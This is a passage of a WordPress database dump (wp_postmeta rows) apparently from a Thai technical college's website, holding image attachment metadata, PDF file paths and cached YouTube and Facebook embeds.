'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:93:\"2019/12/โครงการอนุรักษ์พันธุกรรมพืช.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:93:\"โครงการอนุรักษ์พันธุกรรมพืช-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:93:\"โครงการอนุรักษ์พันธุกรรมพืช-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:94:\"โครงการอนุรักษ์พันธุกรรมพืช-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:94:\"โครงการอนุรักษ์พันธุกรรมพืช-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:93:\"โครงการอนุรักษ์พันธุกรรมพืช-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15146, 6399, '_wp_attached_file', '2019/12/โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเล.jpg'),
(15147, 6399, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:129:\"2019/12/โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเล.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:129:\"โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเล-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:129:\"โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเล-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:130:\"โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเล-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:130:\"โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเล-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:129:\"โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเล-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15148, 6400, '_wp_attached_file', '2019/12/แห่เทียน.jpg'),
(15149, 6400, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:36:\"2019/12/แห่เทียน.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"แห่เทียน-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"แห่เทียน-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"แห่เทียน-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"แห่เทียน-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"แห่เทียน-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15150, 6046, '_oembed_3c6bc067ab3e9d1e78b3d5404e2bb83a', '<div id=\"fb-root\"></div><script async=\"1\" defer=\"1\" crossorigin=\"anonymous\" src=\"https://connect.facebook.net/th_TH/sdk.js#xfbml=1&version=v5.0\"></script><div class=\"fb-post\" data-href=\"https://www.facebook.com/photo.php?fbid=864856183890571&set=a.105012223208308&type=3&theater\" data-width=\"750\"><blockquote cite=\"https://www.facebook.com/photo.php?fbid=864856183890571&set=a.495086494200877&type=3\" class=\"fb-xfbml-parse-ignore\"><p>วิทยาลัยเทคนิคระยอง</p>โพสต์โดย <a href=\"https://www.facebook.com/people/งานประชาสัมพันธ์-วทระยอง/100010985913485\">งานประชาสัมพันธ์ วท.ระยอง</a> เมื่อ <a href=\"https://www.facebook.com/photo.php?fbid=864856183890571&set=a.495086494200877&type=3\">วันพุธที่ 31 กรกฎาคม 2019</a></blockquote></div>'),
(15151, 6046, '_oembed_time_3c6bc067ab3e9d1e78b3d5404e2bb83a', '1575963241'),
(15152, 6035, '_oembed_b0e644e257ef30441e1a06bff5622c65', '<div id=\"fb-root\"></div><script async=\"1\" defer=\"1\" crossorigin=\"anonymous\" src=\"https://connect.facebook.net/th_TH/sdk.js#xfbml=1&version=v5.0\"></script><div class=\"fb-post\" data-href=\"https://www.facebook.com/photo.php?fbid=861590084217181&set=a.235035343539328&type=3&theater\" data-width=\"750\"><blockquote cite=\"https://www.facebook.com/photo.php?fbid=861590084217181&set=a.495086494200877&type=3\" class=\"fb-xfbml-parse-ignore\">โพสต์โดย <a href=\"https://www.facebook.com/people/งานประชาสัมพันธ์-วทระยอง/100010985913485\">งานประชาสัมพันธ์ วท.ระยอง</a> เมื่อ <a href=\"https://www.facebook.com/photo.php?fbid=861590084217181&set=a.495086494200877&type=3\">วันศุกร์ที่ 26 กรกฎาคม 2019</a></blockquote></div>'),
(15153, 6035, '_oembed_time_b0e644e257ef30441e1a06bff5622c65', '1575966225'),
(15154, 2642, '_oembed_1c013cd5f220401b0cb09a64f01e2f20', '<iframe width=\"1220\" height=\"686\" src=\"https://www.youtube.com/embed/zHBbaDHxzu4?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15155, 2642, '_oembed_time_1c013cd5f220401b0cb09a64f01e2f20', '1575970085'),
(15156, 2642, '_oembed_8d14c3576e0a14764dabee2dd0f16d72', '<iframe width=\"1220\" height=\"686\" src=\"https://www.youtube.com/embed/c9S7zZwl-iI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15157, 2642, '_oembed_time_8d14c3576e0a14764dabee2dd0f16d72', '1575970086'),
(15158, 2642, '_oembed_91a5f5b124979cf3bc6f63556bb74692', '<iframe width=\"1220\" height=\"686\" src=\"https://www.youtube.com/embed/txsLpn3jcpo?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15159, 2642, '_oembed_time_91a5f5b124979cf3bc6f63556bb74692', '1575970086'),
(15160, 2642, '_oembed_ccaa875779adffde56c8c6614926f6b7', '<iframe width=\"1220\" height=\"686\" src=\"https://www.youtube.com/embed/lMJQro3JQ3g?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15161, 2642, '_oembed_time_ccaa875779adffde56c8c6614926f6b7', '1575970087'),
(15162, 2642, '_oembed_8ae5487bbbd5116aa04f212ea0bf8553', '<iframe width=\"1220\" height=\"686\" src=\"https://www.youtube.com/embed/CHzurSQGlZA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15163, 2642, '_oembed_time_8ae5487bbbd5116aa04f212ea0bf8553', '1575970087'),
(15164, 2642, '_oembed_dc8420bcef7df0f1eeb352d12000a081', '<iframe width=\"1220\" height=\"686\" src=\"https://www.youtube.com/embed/QHMev_L-eOA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15165, 2642, '_oembed_time_dc8420bcef7df0f1eeb352d12000a081', '1575970087'),
(15166, 3485, '_oembed_6287619c1d944f7b8a2f619687190445', '<iframe width=\"1220\" height=\"915\" src=\"https://www.youtube.com/embed/a7qGKlOZTuc?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15167, 3485, '_oembed_time_6287619c1d944f7b8a2f619687190445', '1575978353'),
(15168, 3485, '_oembed_b07b970bf88b3ca1582b97b900fe7080', '<iframe width=\"1220\" height=\"915\" src=\"https://www.youtube.com/embed/mRsG_Ypyppw?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15169, 3485, '_oembed_time_b07b970bf88b3ca1582b97b900fe7080', '1575978353'),
(15170, 4473, '_oembed_af553ae3a51af19cb872b8ededfa8cda', '<iframe width=\"1220\" height=\"915\" src=\"https://www.youtube.com/embed/4C77KiTi1ag?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15171, 4473, '_oembed_time_af553ae3a51af19cb872b8ededfa8cda', '1575990648'),
(15174, 6405, '_wp_attached_file', '2019/12/111262-04.jpg'),
(15175, 6405, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1189;s:6:\"height\";i:860;s:4:\"file\";s:21:\"2019/12/111262-04.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"111262-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"111262-04-300x217.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:217;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"111262-04-768x555.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:555;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"111262-04-1024x741.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:741;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"111262-04-400x289.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:289;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15176, 6406, '_wp_attached_file', '2019/12/111262-03.jpg'),
(15177, 6406, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1072;s:6:\"height\";i:1527;s:4:\"file\";s:21:\"2019/12/111262-03.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"111262-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"111262-03-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"111262-03-768x1094.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1094;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"111262-03-719x1024.jpg\";s:5:\"width\";i:719;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"111262-03-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15178, 6407, '_wp_attached_file', '2019/12/111262-02.jpg'),
(15179, 6407, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1075;s:6:\"height\";i:1522;s:4:\"file\";s:21:\"2019/12/111262-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"111262-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"111262-02-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"111262-02-768x1087.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1087;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"111262-02-723x1024.jpg\";s:5:\"width\";i:723;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"111262-02-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15180, 6408, '_wp_attached_file', '2019/12/111262-01.jpg'),
(15181, 6408, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1053;s:6:\"height\";i:1554;s:4:\"file\";s:21:\"2019/12/111262-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"111262-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"111262-01-203x300.jpg\";s:5:\"width\";i:203;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"111262-01-768x1133.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1133;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"111262-01-694x1024.jpg\";s:5:\"width\";i:694;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"111262-01-203x300.jpg\";s:5:\"width\";i:203;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15182, 6409, '_wp_attached_file', '2019/12/111262-04-1.jpg'),
(15183, 6409, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1189;s:6:\"height\";i:860;s:4:\"file\";s:23:\"2019/12/111262-04-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"111262-04-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"111262-04-1-300x217.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:217;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"111262-04-1-768x555.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:555;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"111262-04-1-1024x741.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:741;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"111262-04-1-400x289.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:289;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15184, 6410, '_wp_attached_file', '2019/12/111262-03-1.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(15185, 6410, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1072;s:6:\"height\";i:1527;s:4:\"file\";s:23:\"2019/12/111262-03-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"111262-03-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"111262-03-1-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"111262-03-1-768x1094.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1094;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"111262-03-1-719x1024.jpg\";s:5:\"width\";i:719;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"111262-03-1-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15186, 6411, '_wp_attached_file', '2019/12/111262-02-1.jpg'),
(15187, 6411, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1075;s:6:\"height\";i:1522;s:4:\"file\";s:23:\"2019/12/111262-02-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"111262-02-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"111262-02-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"111262-02-1-768x1087.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1087;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"111262-02-1-723x1024.jpg\";s:5:\"width\";i:723;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"111262-02-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15188, 6412, '_wp_attached_file', '2019/12/111262-01-1.jpg'),
(15189, 6412, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1053;s:6:\"height\";i:1554;s:4:\"file\";s:23:\"2019/12/111262-01-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"111262-01-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"111262-01-1-203x300.jpg\";s:5:\"width\";i:203;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"111262-01-1-768x1133.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1133;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"111262-01-1-694x1024.jpg\";s:5:\"width\";i:694;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"111262-01-1-203x300.jpg\";s:5:\"width\";i:203;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15190, 6413, '_edit_lock', '1580451564:14'),
(15191, 6413, '_edit_last', '14'),
(15194, 6413, '_hide_featured', NULL),
(15195, 6416, '_wp_attached_file', '2019/12/รูปเล่มแผนปฏิบัติราชการ-ประจำปีงบประมาณ-256.pdf'),
(15196, 6417, '_wp_attached_file', '2019/12/รูปเล่มแผนปฏิบัติราชการ-ประจำปีงบประมาณ-256-1.pdf'),
(15198, 4478, '_oembed_90942171a8cb639a65e2e9d1b1da2721', '<iframe width=\"1220\" height=\"686\" src=\"https://www.youtube.com/embed/GwqyX1Gk5N0?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15199, 4478, '_oembed_time_90942171a8cb639a65e2e9d1b1da2721', '1576143779'),
(15200, 4478, '_oembed_da92b9652fcdcd6f72968f1abc3646e1', '<iframe width=\"1220\" height=\"686\" src=\"https://www.youtube.com/embed/T10s06PGMHI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15201, 4478, '_oembed_time_da92b9652fcdcd6f72968f1abc3646e1', '1576143779'),
(15202, 4478, '_oembed_9c96f6dae4fb828a0fcfc02df21edd47', '<iframe width=\"1220\" height=\"686\" src=\"https://www.youtube.com/embed/ckSfZebcsik?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15203, 4478, '_oembed_time_9c96f6dae4fb828a0fcfc02df21edd47', '1576143780'),
(15204, 4478, '_oembed_c1a46d4d7ff372b17116ea0ec949945d', '<iframe width=\"1220\" height=\"686\" src=\"https://www.youtube.com/embed/E74lDuIBBQA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15205, 4478, '_oembed_time_c1a46d4d7ff372b17116ea0ec949945d', '1576143780'),
(15206, 4478, '_oembed_abf699df5724164a86edec08d86b0b33', '<iframe width=\"1220\" height=\"686\" src=\"https://www.youtube.com/embed/4KA6AsI33Z0?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15207, 4478, '_oembed_time_abf699df5724164a86edec08d86b0b33', '1576143781'),
(15208, 4478, '_oembed_1a30b8dea9517cf46692d2e50805f6db', '<iframe width=\"1220\" height=\"686\" src=\"https://www.youtube.com/embed/riq-rXXRrho?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15209, 4478, '_oembed_time_1a30b8dea9517cf46692d2e50805f6db', '1576143781'),
(15210, 4478, '_oembed_8b006efd020f20092630782799b9d587', '<iframe width=\"1220\" height=\"686\" src=\"https://www.youtube.com/embed/l2WJsXiMBDw?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15211, 4478, '_oembed_time_8b006efd020f20092630782799b9d587', '1576143781'),
(15212, 4478, '_oembed_79011936874ae7247c42bf8db20d7f01', '<iframe width=\"1220\" height=\"686\" src=\"https://www.youtube.com/embed/HL5n3aSpNCA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15213, 4478, '_oembed_time_79011936874ae7247c42bf8db20d7f01', '1576143782'),
(15216, 6425, '_wp_attached_file', '2019/12/ประกาศผลคัดเลือกโควตาภายใน63.pdf'),
(15217, 6426, '_wp_attached_file', '2019/12/ประกาศผลคัดเลือกโควตาภายนอก63.pdf'),
(15232, 6433, '_wp_attached_file', '2019/12/แผนโครงการกิจกรรมชมรมและองค์การวิชาชีพ-ป.pdf'),
